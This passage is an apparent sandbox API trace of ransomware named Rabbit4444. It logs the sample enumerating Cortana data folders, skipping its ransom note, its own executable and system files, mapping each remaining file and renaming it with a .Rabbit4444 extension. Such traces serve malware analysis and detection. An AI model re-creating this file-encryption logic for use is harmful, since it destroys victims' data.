0x101b78 [0067.565] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7410, lpName=0x0) returned 0x29c [0067.566] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7410) returned 0x70000 [0067.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0067.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.569] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15887977501) returned 1 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.569] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0067.569] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.569] CloseHandle (hObject=0x29c) returned 1 [0067.570] CloseHandle (hObject=0x280) returned 1 [0067.570] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.ft.Rabbit4444") returned 168 [0067.570] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.ft"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.ft.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.ft.rabbit4444"), dwFlags=0x1) returned 1 [0067.570] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c0bccd, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24c0bccd, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24d3d07b, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x25cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 1 [0067.570] lstrcmpiW (lpString1="Apps.index", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.570] lstrcmpiW (lpString1="Apps.index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.570] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444.exe") returned -1 [0067.570] lstrcmpiW (lpString1="Apps.index", lpString2=".") returned 1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="..") returned 1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="windows") returned -1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="bootmgr") returned -1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="pagefile.sys") returned -1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="boot") returned -1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="ids.txt") returned -1 [0067.571] lstrcmpiW (lpString1="Apps.index", lpString2="NTUSER.DAT") returned -1 [0067.571] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.index" | out: lpString1="Apps.index") returned="Apps.index" [0067.571] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.index", dwFileAttributes=0x0) returned 1 [0067.574] lstrlenW (lpString="Apps.index") returned 10 [0067.574] lstrlenW (lpString="Rabbit4444") returned 10 [0067.574] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444") returned -1 [0067.574] lstrlenW (lpString=".dll") returned 4 [0067.574] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0067.574] lstrlenW (lpString=".lnk") returned 4 [0067.574] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0067.574] lstrlenW (lpString=".ini") returned 4 [0067.574] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0067.574] lstrlenW (lpString=".sys") returned 4 [0067.574] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0067.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.574] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.574] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15888499458) returned 1 [0067.574] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=154860) returned 1 [0067.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0067.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0067.574] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25ff0, lpName=0x0) returned 0x29c [0067.575] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25ff0) returned 0x70000 [0067.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0067.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.581] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.582] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15889247795) returned 1 [0067.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0067.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0067.582] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.583] CloseHandle (hObject=0x29c) returned 1 [0067.583] CloseHandle (hObject=0x280) returned 1 [0067.583] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.index.Rabbit4444") returned 171 [0067.583] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.index.rabbit4444"), dwFlags=0x1) returned 1 [0067.584] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c0bccd, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24c0bccd, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24d3d07b, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x25cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 0 [0067.584] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0067.584] lstrcpyW (in: lpString1=0x130ec64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.584] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.585] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.585] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.586] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.586] CloseHandle (hObject=0x280) returned 1 [0067.586] CloseHandle (hObject=0x228) returned 1 [0067.586] GetCurrentThreadId () returned 0xd98 [0067.586] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0067.586] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}" [0067.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0067.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}" [0067.586] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\" [0067.586] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\.BFC0E91B00AE8A0620D3" [0067.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.590] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.592] FlushFileBuffers (hFile=0x228) returned 1 [0067.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.594] CloseHandle (hObject=0x228) returned 1 [0067.594] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}") returned 149 [0067.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.594] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x439aeafc, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf19d08b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0067.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.594] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.594] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.594] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.594] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x439aeafc, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf19d08b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.594] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.594] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.594] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.594] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.595] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.595] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf19d08b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf19d08b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf19d08b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.595] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.595] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.595] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b80a71, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x40b80a71, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x43798cc7, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x541a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.0.filtertrie.intermediate.txt", cAlternateFileName="00FILT~1.TXT")) returned 1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.595] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.595] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.0.filtertrie.intermediate.txt" | out: lpString1="0.0.filtertrie.intermediate.txt") returned="0.0.filtertrie.intermediate.txt" [0067.595] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.596] lstrlenW (lpString="0.0.filtertrie.intermediate.txt") returned 31 [0067.596] lstrlenW (lpString="Rabbit4444") returned 10 [0067.596] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.596] lstrlenW (lpString=".dll") returned 4 [0067.596] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.596] lstrlenW (lpString=".lnk") returned 4 [0067.596] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.596] lstrlenW (lpString=".ini") returned 4 [0067.596] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.596] lstrlenW (lpString=".sys") returned 4 [0067.596] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.596] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.596] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.597] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15890729711) returned 1 [0067.597] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21530) returned 1 [0067.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0067.597] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0067.597] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5720, lpName=0x0) returned 0x29c [0067.598] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5720) returned 0x70000 [0067.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.600] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.600] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.601] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15891144215) returned 1 [0067.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0067.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0067.601] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.601] CloseHandle (hObject=0x29c) returned 1 [0067.601] CloseHandle (hObject=0x280) returned 1 [0067.601] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.601] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.0.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.602] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43798cc7, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x43798cc7, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x4383156f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, 